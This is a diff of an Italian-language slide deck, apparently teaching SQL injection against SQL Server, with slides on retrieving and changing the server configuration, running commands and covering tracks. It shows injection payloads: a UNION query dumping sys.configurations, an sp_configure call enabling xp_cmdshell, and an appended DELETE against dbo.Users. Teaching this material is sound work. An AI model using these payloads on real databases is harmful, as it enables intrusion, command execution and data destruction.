           </a:p>
@@ -15966,7 +17199,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide21.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide24.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -16023,23 +17256,19 @@
             <a:pPr lvl="0" algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Stringhe</a:t>
+              <a:t>Recuperare</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> di </a:t>
+              <a:t> la </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ricerca</a:t>
+              <a:t>configurazione</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>interessanti</a:t>
+              <a:t> del server</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -16287,7 +17516,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide22.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide25.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -16344,23 +17573,19 @@
             <a:pPr lvl="0" algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Stringhe</a:t>
+              <a:t>Recuperare</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> di </a:t>
+              <a:t> la </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ricerca</a:t>
+              <a:t>configurazione</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>interessanti</a:t>
+              <a:t> del server</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -16563,7 +17788,7 @@
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t>' UNION ALL SELECT NULL, CONCAT(C.name, ': ', COALESCE(</a:t>
+              <a:t>' UNION ALL SELECT NULL, CONCAT(C.name, ': ', CONVERT(NVARCHAR, COALESCE(</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
@@ -16599,7 +17824,7 @@
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t>)), NULL, NULL, NULL, NULL FROM </a:t>
+              <a:t>))), NULL, NULL, NULL, NULL FROM </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
@@ -16608,7 +17833,7 @@
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t>sys.configuration</a:t>
+              <a:t>sys.configurations</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0">
@@ -16644,7 +17869,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide23.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide26.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -16701,23 +17926,19 @@
             <a:pPr lvl="0" algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Stringhe</a:t>
+              <a:t>Modificare</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> di </a:t>
+              <a:t> la </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ricerca</a:t>
+              <a:t>configurazione</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>interessanti</a:t>
+              <a:t> del server</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -16938,25 +18159,7 @@
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t> '</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>xp_cmdshell</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" sz="1400" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="FF0000"/>
-                </a:solidFill>
-                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
-              </a:rPr>
-              <a:t>', 1; RECONFIGURE;--</a:t>
+              <a:t> 'max server memory (MB)’, 128; RECONFIGURE;--</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0">
@@ -16983,7 +18186,346 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide24.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide27.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E719B13-508A-3F58-8A59-963E84E7E57E}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C913BCDD-E302-CB36-239C-8BA1038BDF2F}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="965833" y="1490741"/>
+            <a:ext cx="7212334" cy="572700"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr lvl="0" algn="ctr"/>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(Windows) </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>Modificare</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> la </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>configurazione</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> del server</a:t>
+            </a:r>
+            <a:endParaRPr dirty="0"/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:pic>
+        <p:nvPicPr>
+          <p:cNvPr id="129" name="Google Shape;129;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BA5BCA3-4F63-8491-E767-E0CE1EEBD7CE}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvPicPr preferRelativeResize="0"/>
+          <p:nvPr/>
+        </p:nvPicPr>
+        <p:blipFill>
+          <a:blip r:embed="rId3">
+            <a:alphaModFix/>
+          </a:blip>
+          <a:stretch>
+            <a:fillRect/>
+          </a:stretch>
+        </p:blipFill>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="4116500" y="448013"/>
+            <a:ext cx="911000" cy="911000"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+          <a:noFill/>
+          <a:ln>
+            <a:noFill/>
+          </a:ln>
+        </p:spPr>
+      </p:pic>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="130" name="Google Shape;130;p31">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C88EC712-3446-FBD4-D057-CDB2364CF893}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="1128450" y="2195169"/>
+            <a:ext cx="6887100" cy="2292051"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="127000" lvl="0">
+              <a:lnSpc>
+                <a:spcPct val="115000"/>
+              </a:lnSpc>
+              <a:buClr>
+                <a:srgbClr val="D93232"/>
+              </a:buClr>
+              <a:buSzPts val="1600"/>
+            </a:pPr>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>SELECT</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	Id, Title, StartDate, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>EndDate</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>, Result, </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Courses</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>WHERE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>UserId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> = </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>{</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:schemeClr val="accent5">
+                    <a:lumMod val="60000"/>
+                    <a:lumOff val="40000"/>
+                  </a:schemeClr>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>userId</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:schemeClr val="accent1"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>}</a:t>
+            </a:r>
+            <a:br>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+            </a:br>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>	AND Title LIKE '%</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>'; EXECUTE </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>sp_configure</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> '</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>xp_cmdshell</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>', 1; RECONFIGURE;--</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>%' ORDER BY StartDate;</a:t>
+            </a:r>
+            <a:endParaRPr sz="1400" dirty="0">
+              <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+            </a:endParaRPr>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3139792387"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide28.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -17039,16 +18581,12 @@
           <a:p>
             <a:pPr lvl="0" algn="ctr"/>
             <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t>(Windows) </a:t>
+            </a:r>
+            <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Stringhe</a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0"/>
-              <a:t> di </a:t>
-            </a:r>
-            <a:r>
-              <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ricerca</a:t>
+              <a:t>Eseguire</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -17056,7 +18594,19 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>interessanti</a:t>
+              <a:t>comandi</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0" err="1"/>
+              <a:t>sul</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" dirty="0"/>
+              <a:t> server</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -17304,190 +18854,7 @@
 </p:sld>
 </file>
 
-<file path=ppt/slides/slide25.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 118"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="119" name="Google Shape;119;p30"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="2288581" y="1497613"/>
-            <a:ext cx="4566836" cy="572700"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en" dirty="0"/>
-              <a:t>Bobby Tables (xkcd.com #327)</a:t>
-            </a:r>
-            <a:endParaRPr dirty="0"/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="120" name="Google Shape;120;p30"/>
-          <p:cNvPicPr preferRelativeResize="0"/>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId3">
-            <a:alphaModFix/>
-          </a:blip>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="4116500" y="448013"/>
-            <a:ext cx="911000" cy="911000"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-      </p:pic>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="122" name="Google Shape;122;p30"/>
-          <p:cNvSpPr txBox="1"/>
-          <p:nvPr/>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1311750" y="2070313"/>
-            <a:ext cx="6520500" cy="169200"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-          <a:noFill/>
-          <a:ln>
-            <a:noFill/>
-          </a:ln>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
-            <a:spAutoFit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:r>
-              <a:rPr lang="en" sz="1100" dirty="0">
-                <a:solidFill>
-                  <a:srgbClr val="B7B7B7"/>
-                </a:solidFill>
-                <a:latin typeface="Barlow Condensed"/>
-                <a:ea typeface="Barlow Condensed"/>
-                <a:cs typeface="Barlow Condensed"/>
-                <a:sym typeface="Barlow Condensed"/>
-              </a:rPr>
-              <a:t>Molto più di una textbox</a:t>
-            </a:r>
-            <a:endParaRPr sz="1100" dirty="0">
-              <a:solidFill>
-                <a:srgbClr val="B7B7B7"/>
-              </a:solidFill>
-              <a:latin typeface="Barlow Condensed"/>
-              <a:ea typeface="Barlow Condensed"/>
-              <a:cs typeface="Barlow Condensed"/>
-              <a:sym typeface="Barlow Condensed"/>
-            </a:endParaRPr>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-      <p:pic>
-        <p:nvPicPr>
-          <p:cNvPr id="3" name="Picture 2" descr="A cartoon of two people&#10;&#10;AI-generated content may be incorrect.">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74250F4B-E526-08C0-F935-DD5E12CE8501}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvPicPr>
-            <a:picLocks noChangeAspect="1"/>
-          </p:cNvPicPr>
-          <p:nvPr/>
-        </p:nvPicPr>
-        <p:blipFill>
-          <a:blip r:embed="rId4"/>
-          <a:stretch>
-            <a:fillRect/>
-          </a:stretch>
-        </p:blipFill>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1594451" y="2432471"/>
-            <a:ext cx="5955097" cy="1834814"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-      </p:pic>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide26.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/slides/slide29.xml><?xml version="1.0" encoding="utf-8"?>
 <p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
   <p:cSld>
     <p:spTree>
@@ -17544,15 +18911,15 @@
             <a:pPr lvl="0" algn="ctr"/>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>Stringhe</a:t>
+              <a:t>Coprire</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
-              <a:t> di </a:t>
+              <a:t> le </a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>ricerca</a:t>
+              <a:t>proprie</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0"/>
@@ -17560,7 +18927,7 @@
             </a:r>
             <a:r>
               <a:rPr lang="en-US" dirty="0" err="1"/>
-              <a:t>interessanti</a:t>
+              <a:t>tracce</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -17817,7 +19184,25 @@
                 </a:solidFill>
                 <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
               </a:rPr>
-              <a:t> WHERE Email = 'pippo@disney.com');--</a:t>
+              <a:t> WHERE Email = 'pippo@disney.com'); DELETE FROM </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t>dbo.Users</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-US" sz="1400" dirty="0">
+                <a:solidFill>
+                  <a:srgbClr val="FF0000"/>
+                </a:solidFill>
+                <a:latin typeface="Comic Mono" pitchFamily="1" charset="0"/>
+              </a:rPr>
+              <a:t> WHERE Email = 'pippo@disney.com';--</a:t>
             </a:r>
             <a:r>
               <a:rPr lang="en-US" sz="1400" dirty="0">
@@ -17837,603 +19222,6 @@
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="751677404"/>
       </p:ext>
     </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:sld>
-</file>
-
-<file path=ppt/slides/slide27.xml><?xml version="1.0" encoding="utf-8"?>
-<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 127">
-          <a:extLst>
-            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07251E2D-B03C-C34E-5B7B-65E9DCE81DFD}"/>
-            </a:ext>
-          </a:extLst>
-        </p:cNvPr>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="128" name="Google Shape;128;p31">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD71DF1E-E4B6-0505-033D-0B4B5CEE94F1}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="title"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="1290150" y="1454970"/>
-            <a:ext cx="6563700" cy="572700"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
